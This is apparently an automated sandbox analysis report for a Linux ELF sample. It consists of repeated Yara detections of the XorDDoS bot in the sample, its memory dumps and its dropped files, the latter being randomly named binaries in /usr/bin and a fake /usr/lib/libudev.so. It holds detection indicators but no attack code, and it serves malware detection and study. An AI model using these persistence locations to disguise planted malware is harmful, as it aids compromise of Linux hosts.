Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

DDoS

Yara detected XorDDoS Bot

Source: Yara match	File source: TmoTjBkSXT.elf, type: SAMPLE
Source: Yara match	File source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6258.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6222, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6223, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6253, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6258, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6261, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6271, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6274, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6279, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6281, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6291, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6293, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6299, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6325, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6330, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6333, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6342, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6345, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6350, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6353, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6359, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6366, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6369, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6378, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6381, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6383, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6386, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6389, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6395, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6398, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6401, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6403, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6406, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6415, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6418, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6422, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6437, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6443, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6449, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6455, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6459, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6466, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6469, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6471, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6474, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6477, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6483, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6486, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6491, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6500, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/ucawyxmhdv, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/mqnheeruxi, type: DROPPED
Source: Yara match	File source: /usr/bin/zygafieftp, type: DROPPED
Source: Yara match	File source: /usr/bin/rfjhcudkoa, type: DROPPED
Source: Yara match	File source: /usr/bin/flfoijfhrh, type: DROPPED
Source: Yara match	File source: /usr/bin/ybavzvdbws, type: DROPPED
Source: Yara match	File source: /usr/bin/eygutfitxp, type: DROPPED
Source: Yara match	File source: /usr/bin/ljhaidbadz, type: DROPPED
Source: Yara match	File source: /usr/bin/ogbruyreel, type: DROPPED
Source: Yara match	File source: /usr/bin/xilfqxoepi, type: DROPPED
Source: Yara match	File source: /usr/bin/zuuufkngmy, type: DROPPED
Source: Yara match	File source: /usr/bin/vwtoogupfm, type: DROPPED
Source: Yara match	File source: /usr/bin/wrvgghkqdd, type: DROPPED
Source: Yara match	File source: /usr/bin/pmvkvnihjm, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: TmoTjBkSXT.elf, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
